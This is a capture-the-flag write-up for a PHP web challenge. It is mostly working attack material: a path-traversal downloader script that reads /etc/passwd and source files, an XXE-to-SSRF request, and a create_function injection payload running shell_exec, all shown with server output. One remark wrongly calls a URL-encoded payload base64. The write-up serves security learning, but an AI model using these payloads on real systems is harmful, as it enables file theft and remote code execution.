# Bad injections

We are given a very simple page with 4 tabs. The only interesting tag is the last one - List. It contains an image. When we open HTML source of this page, we can see that the image is being loaded from:
```
download?file=files/1.jpg&hash=7e2becd243552b441738ebc6f2d84297
```
Fortunately, the hash (it's MD5 BTW) is a hash of the file name (actually the value of `file` request parameter), not the file contents. We have a directory traversal vulnerability and can read arbitrary files from web server. For example, send the following `GET` request to get the contents of `/etc/passwd` file:
```
http://68.183.31.62:94/download?file=../../../../../../../etc/passwd&hash=069f52aefeef715ebd483ac0f4ac8b9a
```
 Here is a python code that downloads the specified file:
```python
import sys
import md5
import requests
 
file_to_get=sys.argv[1]
file_hash=md5.new(file_to_get).hexdigest()
url='http://68.183.31.62:94/download?file={}&hash={}'.format(file_to_get, file_hash)
print('GET ' + url)
 
r=requests.get(url)
print(r.text)
```
```
$ ./download_file.py ../../../../../../../etc/passwd
GET http://68.183.31.62:94/download?file=../../../../../../../etc/passwd&hash=069f52aefeef715ebd483ac0f4ac8b9a
<br />
<b>Notice</b>:  Undefined variable: type in <b>/app/Controllers/Download.php</b> on line <b>21</b><br />
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
1012
```
Apache httpd configuration is stored in a standard Debian/Ubuntu place, so we can examine it:
```apache
$ ./download_file.py '../../../../../../../etc/apache2/sites-enabled/000-default.conf'
<VirtualHost *:80>
        ServerAdmin webmaster@localhost

        DocumentRoot /var/www/html
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/html>
                Options Indexes FollowSymLinks MultiViews
                # To make wordpress .htaccess work
                AllowOverride FileInfo
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

	#
	# Set HTTPS environment variable if we came in over secure
	#  channel.
	SetEnvIf x-forwarded-proto https HTTPS=on

</VirtualHost>
<Directory /var/www/html>
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>
```
We can see that the web page root directory is `/var/www/html`. Let's look for `index.php` there:
```php
$ ./download_file.py '../../../../../../../var/www/html/index.php'
<?php
ini_set('display_errors',1);
ini_set('display_startup_erros',1);
error_reporting(E_ALL);
require_once('Routes.php');

function __autoload($class_name){
  if(file_exists('./classes/'.$class_name.'.php')){
    require_once './classes/'.$class_name.'.php';
  }else if(file_exists('./Controllers/'.$class_name.'.php')){
    require_once './Controllers/'.$class_name.'.php';
  }

}
?>
```
It includes `Routes.php`, so let's see it:
```php
$ ./download_file.py '../../../../../../../var/www/html/Routes.php'
<?php

Route::set('index.php',function(){
  Index::createView('Index');
});

Route::set('index',function(){
  Index::createView('Index');
});

Route::set('about-us',function(){
  AboutUs::createView('AboutUs');
});

Route::set('contact-us',function(){
  ContactUs::createView('ContactUs');
});

Route::set('list',function(){
  ContactUs::createView('Lista');
});

Route::set('verify',function(){
  if(!isset($_GET['file']) && !isset($_GET['hash'])){
    Verify::createView('Verify');
  }else{
    Verify::verifyFile($_GET['file'],$_GET['hash']);
  }
});


Route::set('download',function(){
  if(isset($_REQUEST['file']) && isset($_REQUEST['hash'])){
    echo Download::downloadFile($_REQUEST['file'],$_REQUEST['hash']);
  }else{
    echo 'jdas';
  }
});

Route::set('verify/download',function(){
  Verify::downloadFile($_REQUEST['file'],$_REQUEST['hash']);
});


Route::set('custom',function(){
  $handler = fopen('php://input','r');
  $data = stream_get_contents($handler);
  if(strlen($data) > 1){
    Custom::Test($data);
  }else{
    Custom::createView('Custom');
  }
});

Route::set('admin',function(){
  if(!isset($_REQUEST['rss']) && !isset($_REQUES['order'])){
    Admin::createView('Admin');
  }else{
    if($_SERVER['REMOTE_ADDR'] == '127.0.0.1' || $_SERVER['REMOTE_ADDR'] == '::1'){
      Admin::sort($_REQUEST['rss'],$_REQUEST['order']);
    }else{
     echo ";(";
    }
  }
});

Route::set('custom/sort',function(){
  Custom::sort($_REQUEST['rss'],$_REQUEST['order']);
});
Route::set('index',function(){
 Index::createView('Index');
});
 ?>
```
The `admin` route looks interesting, but access is granted only if request originates from `127.0.0.1`. We need to find a way to access it. Let's see the `custom` route. It reads the request data and passes it to `Custom::Test`. Let's see `Custom.php`:
```php
$ ./download_file.py '../../../../../../../var/www/html/Controllers/Custom.php'
<?php

class Custom extends Controller{
  public static function Test($string){
      $root = simplexml_load_string($string,'SimpleXMLElement',LIBXML_NOENT);
      $test = $root->name;
      echo $test;
  }

}

 ?>
```
It loads the input data as XML and displays the `$root->name` element. It's vulnerable to XXE (note `LIBXML_NOENT`), so we can leverage it to send a request that will originate from `127.0.0.1` (SSRF) and get the response:
```http
GET /custom HTTP/1.1
Host: 68.183.31.62:94
Content-Length: 356

<?xml version='1.0'?>
<!DOCTYPE root [ 
  <!ENTITY xxe SYSTEM "http://localhost/admin?rss=somevalue&order=somevalue">
]>
<root>
 <name>&xxe;</name>
</root>
```
So we can invoke `Admin::sort`. Let's see what it does:
```php
$ ./download_file.py '../../../../../../../var/www/html/Controllers/Admin.php'
<?php

class Admin extends Controller{
  public static function sort($url,$order){
    $uri = parse_url($url);
    $file = file_get_contents($url);
    $dom = new DOMDocument();
    $dom->loadXML($file,LIBXML_NOENT | LIBXML_DTDLOAD);
    $xml = simplexml_import_dom($dom);
    if($xml){
     //echo count($xml->channel->item);
     //var_dump($xml->channel->item->link);
     $data = [];
     for($i=0;$i<count($xml->channel->item);$i++){
       //echo $uri['scheme'].$uri['host'].$xml->channel->item[$i]->link."\n";
       $data[] = new Url($i,$uri['scheme'].'://'.$uri['host'].$xml->channel->item[$i]->link);
       //$data[$i] = $uri['scheme'].$uri['host'].$xml->channel->item[$i]->link;
     }
     //var_dump($data);
     usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
     echo '<div class="ui list">';
     foreach($data as $dt) {

       $html = '<div class="item">';
       $html .= ''.$dt->id.' - ';
       $html .= ' <a href="'.$dt->link.'">'.$dt->link.'</a>';
       $html .= '</div>';
     }
     $html .= "</div>";
     echo $html;
    }else{
     $html .= "Error, not found XML file!";
     $html .= "<code>";
     $html .= "<pre>";
     $html .= $file;
     $html .= "</pre>";
     $hmlt .= "</code>";
     echo $html;
    }
  }

}

 ?>
```
It reads the XML file from the URL passed in `rss` parameter and then sorts it by the XML node specified in `order` parameter. The sorting is coded in this line:
```php
usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
```
It uses `create_function`, which uses `eval` internally, so we have Code Injection vulnerability via `order` parameter. For example, set `order` to `id,$b->id);}phpinfo();/*` and `phpinfo()` will be executed. We also need to host the following XML file somewhere (e.g. on https://file.io/):
```xml
<?xml version='1.0' standalone="yes"?>
 <root>
 <channel>
   <item>
     <link>http://google.com</link>
   </item>
 </channel>
 </root>
```
The final payload to execute `ls /` will be (I use `php://filter/convert.base64-encode/resource=` to base64 encode the response to avoid any errors due to possible special characters):
```http
GET /custom HTTP/1.1
Host: 68.183.31.62:94
Content-Length: 356

<?xml version='1.0'?>
<!DOCTYPE root [ 
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://localhost/admin?rss=https://file.io/9C6dXc&order=%69%64%2c%24%62%2d%3e%69%64%29%3b%7d%24%61%3d%73%68%65%6c%6c%5f%65%78%65%63%28%22%2f%62%69%6e%2f%6c%73%20%2f%22%29%3b%65%63%68%6f%20%24%61%3b%2f%2a">
]>
<root>
 <name>&xxe;</name>
</root>
```
The value of `order` parameter is base64 encoded to avoid any parsing errors. Unencoded value is `id,$b->id);}$a=shell_exec("/bin/ls /");echo $a;/*`.
The response to the above request was:
```http
HTTP/1.1 200 OK
Date: Sun, 27 Jan 2019 01:41:21 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Vary: Accept-Encoding
Content-Length: 636
Connection: close
Content-Type: text/html

PGJyIC8+CjxiPldhcm5pbmc8L2I+OiAgVW50ZXJtaW5hdGVkIGNvbW1lbnQgc3RhcnRpbmcgbGluZSAxIGluIDxiPi9hcHAvQ29udHJvbGxlcnMvQWRtaW4ucGhwKDIwKSA6IHJ1bnRpbWUtY3JlYXRlZCBmdW5jdGlvbjwvYj4gb24gbGluZSA8Yj4xPC9iPjxiciAvPgphcHAKYmluCmJvb3QKY3JlYXRlX215c3FsX2FkbWluX3VzZXIuc2gKZGEwZjcyZDVkNzkxNjk5NzFiNjJhNDc5YzM0MTk4ZTcKZGV2CmV0Ywpob21lCmxpYgpsaWI2NAptZWRpYQptbnQKb3B0CnByb2MKcm9vdApydW4KcnVuLnNoCnNiaW4Kc3J2CnN0YXJ0LWFwYWNoZTIuc2gKc3RhcnQtbXlzcWxkLnNoCnN5cwp0bXAKdXNyCnZhcgo8ZGl2IGNsYXNzPSJ1aSBsaXN0Ij48ZGl2IGNsYXNzPSJpdGVtIj4xIC0gIDxhIGhyZWY9Imh0dHBzOi8vZmlsZS5pb2h0dHA6Ly9nb29nbGUuY29tIj5odHRwczovL2ZpbGUuaW9odHRwOi8vZ29vZ2xlLmNvbTwvYT48L2Rpdj48L2Rpdj4=
```
After decoding the payload we get:
```
<br />
<b>Warning</b>:  Unterminated comment starting line 1 in <b>/app/Controllers/Admin.php(20) : runtime-created function</b> on line <b>1</b><br />
app
bin
boot
create_mysql_admin_user.sh
da0f72d5d79169971b62a479c34198e7
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
run.sh
sbin
srv
start-apache2.sh
start-mysqld.sh
sys
tmp
usr
var
<div class="ui list"><div class="item">1 -  <a href="https://file.iohttp://google.com">https://file.iohttp://google.com</a></div></div>
```
The flag is in `/da0f72d5d79169971b62a479c34198e7` file, so let's download it:
```
$ ./download_file.py '../../../../../../../da0f72d5d79169971b62a479c34198e7'
GET http://68.183.31.62:94/download?file=../../../../../../../da0f72d5d79169971b62a479c34198e7&hash=046b92ccf38c3555f133c8c92d702bdd
<br />
<b>Notice</b>:  Undefined variable: type in <b>/app/Controllers/Download.php</b> on line <b>21</b><br />
f#{1_d0nt_kn0w_wh4t_i4m_d01ng}
31
```
The flag is `f#{1_d0nt_kn0w_wh4t_i4m_d01ng}`.